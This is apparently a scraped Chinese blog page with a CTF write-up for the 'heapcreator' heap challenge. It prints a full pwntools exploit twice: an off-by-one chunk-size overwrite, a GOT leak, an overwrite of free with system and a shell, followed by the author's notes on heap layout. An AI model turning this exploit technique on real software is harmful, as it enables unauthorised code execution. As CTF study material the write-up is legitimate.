2. 程式人生 > 其它 >hitcontraining_heapcreator 一點小疑惑

hitcontraining_heapcreator 一點小疑惑

阿新 發佈:2021-09-28

exp:

from pwn import *
from LibcSearcher import LibcSearcher
#sh=remote("node3.buuoj.cn",25984)
sh = process("./heapcreator")
elf=ELF('./heapcreator')

def create(length,value):
    sh.recvuntil("Your choice :")
    sh.sendline("1")
    sh.recvuntil("Size of Heap : ")
    sh.sendline(str(int(length)))
    sh.recvuntil(
 
"Content of heap:")
    sh.sendline(value)
def edit(index,value):
    sh.recvuntil("Your choice :")
    sh.sendline("2")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))
    sh.recvuntil("Content of heap : ")
    sh.sendline(value)
def show(index):
    sh.recvuntil("Your choice :")
    sh.sendline(
 
"3")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))
def delete(index):
    sh.recvuntil('Your choice :')
    sh.sendline('4')
    sh.recvuntil('Index :')
    sh.sendline(str(int(index)))

create(0x18,'aaaa')
create(0x10,'bbbb')
create(0x10,'cccc')
create(0x10,'/bin/sh')

edit(0,'a'*0x18+'\x81')
delete(
 
1)

size = b'\x08'.ljust(8,b'\x00')
payload = b'd'*0x40+ size + p64(elf.got['free'])
create(0x70,payload)
gdb.attach(sh)
show(2)
sh.recvuntil('Content : ')
free_addr = u64(sh.recvuntil('Done')[:-5].ljust(8,b'\x00'))

libc=LibcSearcher("free",free_addr)
system_addr=free_addr+libc.dump("system")-libc.dump("free")

edit(2,p64(system_addr))
delete(3)
sh.interactive()
from pwn import *
from LibcSearcher import LibcSearcher
#sh=remote("node3.buuoj.cn",25984)
sh = process("./heapcreator")
elf=ELF('./heapcreator')

def create(length,value):
    sh.recvuntil("Your choice :")
    sh.sendline("1")
    sh.recvuntil("Size of Heap : ")
    sh.sendline(str(int(length)))
    sh.recvuntil("Content of heap:")
    sh.sendline(value)
def edit(index,value):
    sh.recvuntil("Your choice :")
    sh.sendline("2")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))
    sh.recvuntil("Content of heap : ")
    sh.sendline(value)
def show(index):
    sh.recvuntil("Your choice :")
    sh.sendline("3")
    sh.recvuntil("Index :")
    sh.sendline(str(int(index)))
def delete(index):
    sh.recvuntil('Your choice :')
    sh.sendline('4')
    sh.recvuntil('Index :')
    sh.sendline(str(int(index)))

create(0x18,'aaaa')
create(0x10,'bbbb')
create(0x10,'cccc')
create(0x10,'/bin/sh')

edit(0,'a'*0x18+'\x81')
delete(1)

size = b'\x08'.ljust(8,b'\x00')
payload = b'd'*0x40+ size + p64(elf.got['free'])
create(0x70,payload)
gdb.attach(sh)
show(2)
sh.recvuntil('Content : ')
free_addr = u64(sh.recvuntil('Done')[:-5].ljust(8,b'\x00'))

libc=LibcSearcher("free",free_addr)
system_addr=free_addr+libc.dump("system")-libc.dump("free")

edit(2,p64(system_addr))
delete(3)
sh.interactive()

1.為什麼要將chunk1釋放後再進行malloc,然後填入資料。而不是直接填入資料?

假如直接填入資料的話,改變一下exp

然後檢視堆發現

chunk1的size沒有變,所以最多還是隻能輸入0x10大小的資料,所以我們要先free掉,然後再malloc(0x70),讓chunk的size變成0x70,然後填充資料

2.如圖

為什麼填入的資料會從0x1616050開始?

因為每次add都會創立兩個chunk,第一個chunk就是0x1616070處,在後面將會被覆蓋,所以我會有這個疑問。第二個chunk,也就是填入資料的chunk,就在0x1616040,0x1616048是size,0x1616050是資料儲存的地方。

相關推薦

hitcontraining_heapcreator 一點疑惑

exp: from pwn import * from LibcSearcher import LibcSearcher #sh=remote(\"node3.buuoj.cn\",25984) sh = process(\"./heapcreator\")

關於redigo中PubSub的一點坑分析

前言 最近在用 golang 做一些 redis 相關的操作,選用了 redigo 這個第三方庫。然後在使用 Pub/Sub 的時候,卻發現了一個坑……

mybatis關於Criteria的一點坑。。。

目錄 在用Criteria時,相關程式碼如下: final RolePermissionExample example = new RolePermissionExample();

c語言一點覺悟(1)

1 #include <stdio.h> 2 3 int a = 0x12345678; 4 int a2 = 0x12345678; 5 int a3 = 0x12345678; 6 int a4 = 0x12345678;

關於開發工具的一點想法

前段時間還準備大寫特寫,最近有點忙,也就忽略了。其實也是懶,忙都是假的。剛想起來,以最快的速度記錄下當前的一點想法。

模擬ATM程式碼(有一點問題)

一、測試要求: 1、按照測試內容要求完成程式的設計與程式設計; 2、建立學號姓名資料夾,如:“信1705-1班20173425陳歡”,將源程式檔案、accountinformation.txt、accountlist.txt儲存在資料夾中,壓縮成rar檔案

每天一點進步--css中的counter-increment和counter-reset屬性

技術標籤:htmlcsscsshtml 1.定義 counter-reset 可以建立一個或者多個計數器 counter-increment 用來遞增計數器,可以是多個

MySQL-常見疑惑

1. DISTINCT 多列去重   1.1 select DISTINCT a,b 實際含義是?     正確:排除 (a列重複且b列重複)的記錄 

遞迴函式的一點感悟

技術標籤:演算法總結+思考演算法python遞迴演算法 最近在複習Python的遞迴函式部分,突然有了一些感悟,想趕緊先記錄下來,日後再深入思考,完善這篇文章

關於cin>>的一點細節

​ 前些時間學了dijstra,因為一處bug卡了很久,反覆亂調後發現是main函式的初始化圖出現了問題,已經接觸過的朋友應該一看就懂,沒學過的朋友只要知道下面的程式碼是關於圖的初始化,map[i][j]就是節點i到節點j的距

Golang - 關於 proto 檔案的一點思考

目錄前言helloworld.proto思考小結推薦閱讀 前言 ProtoBuf 是什麼? ProtoBuf 是一套介面描述語言(IDL),通俗的講是一種資料表達方式,也可以稱為資料交換格式。

走好自己的路:每天的一點思考

沒有人會再來看到了罷   重新回到部落格園,給自己開一小片地方,記錄一點點思考。反正也不會有人看到,索性公開了,也不上鎖罷。哈哈。

關於蟻劍反制深入的分析和利用的一點思路

關於蟻劍反制深入的分析和利用的一點小思路 ​ 前言 前幾天我在公眾號看到了一篇名為《端內釣魚,反制蟻劍》的文章,我覺得這個思路很好,之後決定深入研究一下,通過兩天的研究,現在已經寫出了比較真實的反制馬

對求職面試者的一點建議

  公司是個幾十人的創業公司,雖然人數不多,不過有穩定的現金流,去年的業務收益也在持續增長。

關於開發中的版本問題的一點建議

關於開發中的版本問題的一點建議 ■ 本文是以springboot專案開發中遇到的問題為例:

關於埃爾登法環一些不吐不快的感受,和給新人朋友們的一點TIP

       最近看了一些對埃爾登法環批評的視訊和文章,我在這裡也想發表一些自己的看法,歡迎大家參與討論,但不要上頭。都是些個人看法有錯誤和偏差是一定的。說出來只是跟大家分享一下博君一樂。

林求職記(二):說好的問基礎,為啥我感覺一點也不基礎呢?

在上一輪的面試中,林在mysql方面因為作答不夠完善,被面試官吊打了一番。經過兩天的自我複習之後,新的一輪面試又開始了。

洛谷 P3951 NOIP 2017 凱的疑惑

洛谷 P3951 NOIP 2017 凱的疑惑 題目描述 凱手中有兩種面值的金幣,兩種面值均為正整數且彼此互素。每種金幣凱都有 無數個。在不找零的情況下,僅憑這兩種金幣,有些物品他是無法準確支付的。現在 凱想知道在

[NOIP2017] 凱的疑惑 - 數論,gcd

Description 給定兩個互質的整數,問用這兩個整數的倍和無法表示的整數中的最大值是多少。

【漫畫】進名媛圈也要考程式設計?腦袋裡大大的疑惑

論如何找到連結串列的倒數第n個結點? ————— 第二天 ————— 什麼意思呢?我們以下面這個連結串列為例: